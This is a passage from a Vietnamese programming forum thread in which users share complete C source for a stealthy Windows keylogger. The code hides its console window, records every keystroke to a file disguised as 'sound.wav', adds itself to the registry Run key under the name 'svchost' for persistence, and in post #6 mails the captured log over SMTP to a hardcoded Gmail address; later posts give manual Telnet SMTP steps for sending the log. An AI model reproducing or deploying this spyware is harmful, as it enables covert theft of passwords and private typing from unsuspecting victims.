  112.                             break;
  113.                             case VK_OEM_PERIOD:
  114.                             fputc('.',file);
  115.                             fclose(file);
  116.                             break;*/
  117.                         case VK_NUMPAD0:
  118.                             fputc('0',file);
  119.                             fclose(file);
  120.                             break;
  121.                         case VK_NUMPAD1:
  122.                             fputc('1',file);
  123.                             fclose(file);
  124.                             break;
  125.                         case VK_NUMPAD2:
  126.                             fputc('2',file);
  127.                             fclose(file);
  128.                             break;
  129.                         case VK_NUMPAD3:
  130.                             fputc('3',file);
  131.                             fclose(file);
  132.                             break;
  133.                         case VK_NUMPAD4:
  134.                             fputc('4',file);
  135.                             fclose(file);
  136.                             break;
  137.                         case VK_NUMPAD5:
  138.                             fputc('5',file);
  139.                             fclose(file);
  140.                             break;
  141.                         case VK_NUMPAD6:
  142.                             fputc('6',file);
  143.                             fclose(file);
  144.                             break;
  145.                         case VK_NUMPAD7:
  146.                             fputc('7',file);
  147.                             fclose(file);
  148.                             break;
  149.                         case VK_NUMPAD8:
  150.                             fputc('8',file);
  151.                             fclose(file);
  152.                             break;
  153.                         case VK_NUMPAD9:
  154.                             fputc('9',file);
  155.                             fclose(file);
  156.                             break;
  157.                         case VK_CAPITAL:
  158.                             fputs("[CAPS LOCK]",file);
  159.                             fclose(file);
  160.                             break;
  161.                         default:
  162.                             fclose(file);
  163.                             break;
  164.                         }        
  165.                     }    
  166.                 }        
  167.             }    
  168.         }                  
  169.  
  170.     }
  171.     return EXIT_SUCCESS;                            
  172. }                                                
  173.  
  174. int test_key(void)
  175. {
  176.     int check;
  177.     HKEY hKey;
  178.     char path[BUFSIZE];
  179.     DWORD buf_length=BUFSIZE;
  180.     int reg_key;
  181.  
  182.     reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
  183.     if(reg_key!=0)
  184.     {    
  185.         check=1;
  186.         return check;
  187.     }        
  188.  
  189.     reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
  190.  
  191.     if((reg_key!=0)||(buf_length>BUFSIZE))
  192.         check=2;
  193.     if(reg_key==0)
  194.         check=0;
  195.  
  196.     RegCloseKey(hKey);
  197.     return check;  
  198. }
  199.  
  200. int create_key(char *path)
  201. {  
  202.     int reg_key,check;
  203.  
  204.     HKEY hkey;
  205.  
  206.     reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  207.     if(reg_key==0)
  208.     {
  209.         RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
  210.         check=0;
  211.         return check;
  212.     }
  213.     if(reg_key!=0)
  214.         check=1;
  215.  
  216.     return check;
  217. }

  sau đây là Project
  Attached Files Attached Files
  Đã được chỉnh sửa lần cuối bởi AlexF : 29-06-2010 lúc 04:44 PM.

 5. #5
  Ngày gia nhập
  12 2008
  Bài viết
  17

  Tui nghe nói có một cách để đọc và gửi mail bằng Telnet cmd gõ Telnet.Tui đã tạo vào gửi được mail bằng Telnet này bằng mail của google bằng SMTP ... bạn vào google gõ Telnet nghiên cứu và làm code C gửi mail thử.

 6. #6
  Ngày gia nhập
  02 2008
  Bài viết
  1,009

  Mặc định Gửi Mail Bằng Gmail Và bắt Keylog

  Gửi Mail Bằng Gmail Và bắt Keylog:

  Visual C++ Code:
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <winuser.h>
  4. #include <windowsx.h>
  5. #include <time.h>
  6. int MailIt (char *mailserver, char *emailto, char *emailfrom,
  7. char *emailsubject, char *emailmessage);
  8. #define BUFsize 800
  9. #define waittime 500
  10. /*If you don't know the mail exchange server for an address for the following
  11. "nslookup -querytype=mx gmail.com" but replace gmail.com with the domain for
  12. whatever email address you want. YOU MUST CHANGE  THESE SETTINGS OR
  13. IT WILL NOT WORK!!! */
  14. #define cmailserver "gmail-smtp-in.l.google.com"
  15. #define cemailto "irong33k@gmail.com"
  16. #define cemailfrom "irong33k@gmail.com"
  17. #define LogLength 100
  18. #define FileName "sound.wav"
  19. #define SMTPLog "ring.wav"
  20. #define cemailsubject "Logged"
  21.  
  22. int test_key(void);
  23. int main(void)
  24. {
  25. //Uncomment the lines below to put the keylogger in stealh mode.
  26. HWND stealth; /*creating stealth */
  27. AllocConsole();
  28. stealth=FindWindowA("ConsoleWindowClass",NULL);
  29. ShowWindow(stealth,0);
  30.  
  31. {FILE *file;
  32. file=fopen(FileName,"a+");
  33. time_t theTime=time(0);
  34. fputs("\nStarted logging: ", file);
  35. fputs(ctime(&theTime),file);
  36. fclose(file);
  37. }
  38.  
  39. /* if (test==2)
  40. {//the path in which the file needs to be
  41. char *path="c:\\%windir%\\svchost.exe";
  42. create=create_key(path);    
  43. } */
  44.  
  45. int t=get_keys();
  46. return t;
  47. }
  48.  
  49. int get_keys(void)
  50. {
  51. int freadindex;
  52. char *buf;
  53. long len;
  54. FILE *file;
  55. file=fopen(FileName,"a+");
  56.  
  57.  
  58.        short character;
  59.          while(1)
  60.          {
  61.                 sleep(10);/*to prevent 100% cpu usage*/
  62.                 for(character=8;character<=222;character++)
  63.                 {
  64.                     if(GetAsyncKeyState(character)==-32767)
  65.                     {
  66.                         FILE *file;
  67.                         file=fopen(FileName,"a+");
  68.                         if(file==NULL)
  69.                         {
  70.                                 return 1;
  71.                         }      
  72.                         if(file!=NULL)
  73.                         {  
  74.                                 if((character>=39)&&(character<=64))
  75.                                 {
  76.                                       fputc(character,file);
  77.                                       fclose(file);
  78.                                       break;
  79.                                 }  
  80.                                 else if((character>64)&&(character<91))
  81.                                 {
  82.                                       character+=32;
  83.                                       fputc(character,file);
  84.                                       fclose(file);
  85.                                       break;
  86.                                 }
  87.                                 else
  88.                                 {
  89.                                     switch(character)
  90.                                     {
  91.                                           case VK_SPACE:
  92.                                           fputc(' ',file);
  93.                                           fclose(file);
  94.                                           break;
  95.                                           case VK_SHIFT:
  96.                                           fputs("\r\n[SHIFT]\r\n",file);
  97.                                           fclose(file);
  98.                                           break;                                      
  99.                                           case VK_RETURN:
  100.                                           fputs("\r\n[ENTER]\r\n",file);
  101.                                           fclose(file);
  102.                                           break;
  103.                                           case VK_BACK:
  104.                                           fputs("\r\n[BACKSPACE]\r\n",file);
  105.                                           fclose(file);
  106.                                           break;
  107.                                           case VK_TAB:
  108.                                           fputs("\r\n[TAB]\r\n",file);
  109.                                           fclose(file);
  110.                                           break;
  111.                                           case VK_CONTROL:
  112.                                           fputs("\r\n[CTRL]\r\n",file);
  113.                                           fclose(file);
  114.                                           break;
  115.                                           case VK_DELETE:
  116.                                           fputs("\r\n[DEL]\r\n",file);
  117.                                           fclose(file);
  118.                                           break;
  119.                                           case VK_OEM_1:
  120.                                           fputs("\r\n[;:]\r\n",file);
  121.                                           fclose(file);
  122.                                           break;
  123.                                           case VK_OEM_2:
  124.                                           fputs("\r\n[/?]\r\n",file);
  125.                                           fclose(file);
  126.                                           break;
  127.                                           case VK_OEM_3:
  128.                                           fputs("\r\n[`~]\r\n",file);
  129.                                           fclose(file);
  130.                                           break;
  131.                                           case VK_OEM_4:
  132.                                           fputs("\r\n[ [{ ]\r\n",file);
  133.                                           fclose(file);
  134.                                           break;
  135.                                           case VK_OEM_5:
  136.                                           fputs("\r\n[\\|]\r\n",file);
  137.                                           fclose(file);
  138.                                           break;                          
  139.                                           case VK_OEM_6:
  140.                                           fputs("\r\n[ ]} ]\r\n",file);
  141.                                           fclose(file);
  142.                                           break;
  143.                                           case VK_OEM_7:
  144.                                           fputs("\r\n['\"]\r\n",file);
  145.                                           fclose(file);
  146.                                           break;
  147.                                           case 187:
  148.                                           fputc('+',file);
  149.                                           fclose(file);
  150.                                           break;
  151.                                           case 188:
  152.                                           fputc(',',file);
  153.                                           fclose(file);
  154.                                           break;
  155.                                           case 189:
  156.                                           fputc('-',file);
  157.                                           fclose(file);
  158.                                           break;
  159.                                           case 190:
  160.                                           fputc('.',file);
  161.                                           fclose(file);
  162.                                           break;
  163.                                           case VK_NUMPAD0:
  164.                                           fputc('0',file);
  165.                                           fclose(file);
  166.                                           break;
  167.                                           case VK_NUMPAD1:
  168.                                           fputc('1',file);
  169.                                           fclose(file);
  170.                                           break;
  171.                                           case VK_NUMPAD2:
  172.                                           fputc('2',file);
  173.                                           fclose(file);
  174.                                           break;
  175.                                           case VK_NUMPAD3:
  176.                                           fputc('3',file);
  177.                                           fclose(file);
  178.                                           break;
  179.                                           case VK_NUMPAD4:
  180.                                           fputc('4',file);
  181.                                           fclose(file);
  182.                                           break;
  183.                                           case VK_NUMPAD5:
  184.                                           fputc('5',file);
  185.                                           fclose(file);
  186.                                           break;
  187.                                           case VK_NUMPAD6:
  188.                                           fputc('6',file);
  189.                                           fclose(file);
  190.                                           break;
  191.                                           case VK_NUMPAD7:
  192.                                           fputc('7',file);
  193.                                           fclose(file);
  194.                                           break;
  195.                                           case VK_NUMPAD8:
  196.                                           fputc('8',file);
  197.                                           fclose(file);
  198.                                           break;
  199.                                           case VK_NUMPAD9:
  200.                                           fputc('9',file);
  201.                                           fclose(file);
  202.                                           break;
  203.                                           case VK_CAPITAL:
  204.                                           fputs("\r\n[CAPS LOCK]\r\n",file);
  205.                                           fclose(file);
  206.                                           break;
  207.                                           default:
  208.                                           fclose(file);
  209.                                           break;
  210.                                    }  
  211.                               }
  212.                          }  
  213.                }
  214.            }            
  215.        FILE *file;
  216.        file=fopen(FileName,"rb");
  217.        fseek(file,0,SEEK_END); //go to end
  218.        len=ftell(file); //get position at end (length)
  219.        if(len>=LogLength) {
  220.          fseek(file,0,SEEK_SET);//go to beg.
  221.          buf=(char *)malloc(len);//malloc buffer
  222.          freadindex=fread(buf,1,len,file);//read into buffer
  223.          buf[freadindex] = '\0';//Extra bit I have to add to make it a sting
  224.          MailIt( cmailserver, cemailto, cemailfrom, cemailsubject, buf);
  225.          fclose(file);
  226.          file=fopen(FileName,"w");                  
  227.          }
  228.  
  229.         fclose(file);
  230.         //free (buf);
  231.        
  232.        }
  233.        return EXIT_SUCCESS;                      
  234. }
  235.  
  236. int MailIt (char *mailserver, char *emailto, char *emailfrom,
  237. char *emailsubject, char *emailmessage) {
  238. SOCKET sockfd;
  239. WSADATA wsaData;
  240. FILE *smtpfile;
  241.  
  242. #define bufsize 300
  243. int bytes_sent;   /* Sock FD */
  244. int err;
  245. struct hostent *host;   /* info from gethostbyname */
  246. struct sockaddr_in dest_addr;   /* Host Address */
  247. char line[1000];
  248. char *Rec_Buf = (char*) malloc(bufsize+1);
  249. smtpfile=fopen(SMTPLog,"a+");
  250. if (WSAStartup(0x202,&wsaData) == SOCKET_ERROR) {
  251.   fputs("WSAStartup failed",smtpfile);
  252.   WSACleanup();
  253.   return -1;
  254. }
  255. if ( (host=gethostbyname(mailserver)) == NULL) {
  256.    perror("gethostbyname");
  257.    exit(1);
  258. }
  259. memset(&dest_addr,0,sizeof(dest_addr));
  260. memcpy(&(dest_addr.sin_addr),host->h_addr,host->h_length);
  261.  
  262.  /* Prepare dest_addr */
  263.  dest_addr.sin_family= host->h_addrtype;  /* AF_INET from gethostbyname */
  264.  dest_addr.sin_port= htons(25); /* PORT defined above */
  265.  
  266.  /* Get socket */
  267.  
  268.  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0) {
  269.     perror("socket");
  270.     exit(1);
  271.     }
  272.  /* Connect !*/
  273.  fputs("Connecting....\n",smtpfile);
  274.  
  275. if (connect(sockfd, (struct sockaddr *)&dest_addr,sizeof(dest_addr)) == -1){
  276.     perror("connect");
  277.     exit(1);
  278.     }
  279.  sleep(waittime);
  280.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  281.  fputs(Rec_Buf,smtpfile);
  282.  strcpy(line,"helo me.somepalace.com\n");
  283.  fputs(line,smtpfile);
  284.  bytes_sent=send(sockfd,line,strlen(line),0);
  285.  sleep(waittime);
  286.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  287.  fputs(Rec_Buf,smtpfile);
  288.  strcpy(line,"MAIL FROM:<");
  289.  strncat(line,emailfrom,strlen(emailfrom));
  290.  strncat(line,">\n",3);
  291.  fputs(line,smtpfile);
  292.  bytes_sent=send(sockfd,line,strlen(line),0);
  293.  sleep(waittime);
  294.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  295.  fputs(Rec_Buf,smtpfile);
  296.  strcpy(line,"RCPT TO:<");
  297.  strncat(line,emailto,strlen(emailto));
  298.  strncat(line,">\n",3);
  299.  fputs(line,smtpfile);
  300.  bytes_sent=send(sockfd,line,strlen(line),0);
  301.  sleep(waittime);
  302.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  303.  fputs(Rec_Buf,smtpfile);
  304.  strcpy(line,"DATA\n");
  305.  fputs(line,smtpfile);
  306.  bytes_sent=send(sockfd,line,strlen(line),0);
  307.  sleep(waittime);
  308.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  309.  fputs(Rec_Buf,smtpfile);
  310.  sleep(waittime);
  311.  strcpy(line,"To:");
  312.  strcat(line,emailto);
  313.  strcat(line,"\n");
  314.  strcat(line,"From:");
  315.  strcat(line,emailfrom);
  316.  strcat(line,"\n");
  317.  strcat(line,"Subject:");
  318.  strcat(line,emailsubject);
  319.  strcat(line,"\n");
  320.  strcat(line,emailmessage);
  321.  strcat(line,"\r\n.\r\n");
  322.  fputs(line,smtpfile);
  323.  bytes_sent=send(sockfd,line,strlen(line),0);
  324.  sleep(waittime);
  325.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  326.  fputs(Rec_Buf,smtpfile);
  327.  strcpy(line,"quit\n");
  328.  fputs(line,smtpfile);
  329.  bytes_sent=send(sockfd,line,strlen(line),0);
  330.  sleep(waittime);
  331.  err=recv(sockfd,Rec_Buf,bufsize,0);Rec_Buf[err] = '\0';
  332.  fputs(Rec_Buf,smtpfile);
  333.  fclose(smtpfile);                    
  334.  #ifdef WIN32
  335.  closesocket(sockfd);
  336.  WSACleanup();
  337.  #else
  338.  close(sockfd);
  339.  #endif
  340. }
  Đã được chỉnh sửa lần cuối bởi AlexF : 28-07-2010 lúc 10:38 PM.

 7. #7
  Ngày gia nhập
  12 2008
  Bài viết
  17

  vào run gõ :cmd
  gõ telnet gmail-smtp-in.l.google.com 25
  gõ HELO gmail
  gõ MAIL FROM:<yourmail@gmail.com> (lưu ý gõ luôn dấu <>)
  gõ RCPT TO:<mailnhan1989@gmail.com>(lưu ý gõ luôn dấu <>)
  gõ DATA gõ enter xuống hàng
  gõ noi dung thu vi du HELLO I SEND MAIL FOR YOU
  để kết thúc gõ enter xuống hàng và gõ dấu chấm (.)
  gõ QUIT để thoát
  trong các bước trên nếu lỡ gõ sai phải làm lại khong backspace được
  -Không biết cách này có code bằng C được không nếu được có thể dùng lệnh open file keylog.tx sau đó đọc nội dung rồi chuyển thành thư gửi đi bác nguyên cứu thử

 8. #8
  Ngày gia nhập
  04 2008
  Bài viết
  244

  nếu bạn sử dụng CMD để chạy thì có thể dùng hàm
  #include<stdlib>
  system("lệnh đánh vào");
  để chạy

 9. #9
  Ngày gia nhập
  02 2009
  Bài viết
  88

  sao mình làm giống bạn có thấy gửi được Mail đâu bạn
  Attached Files Attached Files
  • Kiểu file: rar ds.rar (190 Bytes, 137 views)

 10. #10
  Ngày gia nhập
  09 2008
  Bài viết
  5

  chẹp, muốn gửi thư dùng SMTP thì dùng socket ấy
  đọc thêm 1 ít thông tin về SMTP là ok ngay

Các đề tài tương tự

 1. Lập trình virus trojan backdoor nâng cao.
  Gửi bởi Phanonra trong diễn đàn Lập trình Virus & Anti-Virus
  Trả lời: 5
  Bài viết cuối: 01-06-2016, 06:11 PM
 2. RegRun Security Suite Platinum 6.99 - Chống keylog và trojan
  Gửi bởi thienco0301 trong diễn đàn Software (Phần mềm) | Ebooks
  Trả lời: 0
  Bài viết cuối: 24-04-2012, 01:41 PM
 3. RegRun Security Suite Platinum 6.99 - Chống keylog và trojan
  Gửi bởi chjentha11 trong diễn đàn Software (Phần mềm) | Ebooks
  Trả lời: 0
  Bài viết cuối: 16-09-2011, 10:38 AM
 4. Source code build trên Ubuntu có chạy được Trên Linux Kernel không ?
  Gửi bởi trần trân trong diễn đàn Thắc mắc lập trình C/C++ trên Linux
  Trả lời: 0
  Bài viết cuối: 03-11-2010, 09:22 AM
 5. Tớ bị dính con Trojan.Vundo.DRL >"<
  Gửi bởi iamvtn trong diễn đàn Thắc mắc chung
  Trả lời: 12
  Bài viết cuối: 01-12-2007, 01:54 PM

Quyền hạn của bạn

 • Bạn không thể gửi đề tài mới
 • Bạn không thể gửi bài trả lời
 • Bạn không thể gửi các đính kèm
 • Bạn không thể chỉnh sửa bài viết của bạn